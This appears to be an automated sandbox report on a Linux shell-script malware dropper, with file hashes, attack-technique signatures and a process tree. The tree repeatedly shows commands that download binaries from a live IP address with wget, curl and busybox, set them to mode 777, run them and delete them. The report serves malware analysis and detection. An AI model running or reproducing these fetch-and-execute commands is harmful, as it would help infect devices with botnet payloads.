Analysis
-
max time kernel
76s -
max time network
78s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mips image:debian9-mipsbe-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
21/10/2024, 01:42
Static task
static1
Behavioral task
behavioral1
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh
-
Size
10KB
-
MD5
24af39cdca62a1ed0bec6400cfa74142
-
SHA1
ad31bab8b77d23f47f5ca207a515dfed28a2bd5a
-
SHA256
c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b
-
SHA512
24fd5e5bb157fe20152b4811bad30f52b5aa416a3faf7ae5c06d3e7fa6388dcb41d528a9aa87bb6c886380c2cf8457510bc89e7d08ae1096ae8d2da0e1f61476
-
SSDEEP
192:HMUrAEWq+TPsHnmpFoBZFD0+kolLMUrAEaTPsHncpFoBZf:HMUrAEWqF0FmMUrAEp
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Process: chmod
PIDs: 970, 982, 1000, 1006, 877, 871, 898, 904, 988, 994, 844, 964, 976, 892, 922, 952, 766, 946, 940, 916, 928, 801, 865, 886, 910, 934, 958, 781
-
Executes dropped EXE 28 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh1⤵PID:735
-
/bin/rm/bin/rm bins.sh2⤵PID:738
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:765
-
-
/bin/chmodchmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:768
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:769
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:772
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:779
-
-
/bin/chmodchmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:785
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:787
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:799
-
-
/bin/chmodchmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:806
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:828
-
-
/bin/chmodchmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:850
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:864
-
-
/bin/chmodchmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:870
-
-
/bin/chmodchmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:876
-
-
/bin/chmodchmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:885
-
-
/bin/chmodchmod 777 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp./HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:891
-
-
/bin/chmodchmod 777 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2./tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:897
-
-
/bin/chmodchmod 777 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY./6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:903
-
-
/bin/chmodchmod 777 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck./7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:909
-
-
/bin/chmodchmod 777 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG./SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:915
-
-
/bin/chmodchmod 777 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv./tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:921
-
-
/bin/chmodchmod 777 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah./KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:927
-
-
/bin/chmodchmod 777 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2./tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O22⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:933
-
-
/bin/chmodchmod 777 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY./6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:939
-
-
/bin/chmodchmod 777 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck./7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:945
-
-
/bin/chmodchmod 777 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG./SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:951
-
-
/bin/chmodchmod 777 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv./tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:957
-
-
/bin/chmodchmod 777 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah./KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:963
-
-
/bin/chmodchmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:969
-
-
/bin/chmodchmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm2⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:975
-
-
/bin/chmodchmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA2⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:981
-
-
/bin/chmodchmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw2⤵PID:984
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:985
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:987
-
-
/bin/chmodchmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb2⤵PID:990
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:991
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:993
-
-
/bin/chmodchmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k2⤵PID:996
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:997
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Reads runtime system information
- Writes file to tmp directory
PID:998
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:999
-
-
/bin/chmodchmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵
- Executes dropped EXE
PID:1001
-
-
/bin/rmrm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ6132⤵PID:1002
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1003
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1004
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1005
-
-
/bin/chmodchmod 777 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- File and Directory Permissions Modification
PID:1006
-
-
/tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp./HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵
- Executes dropped EXE
PID:1007
-
-
/bin/rmrm HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp2⤵PID:1008
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97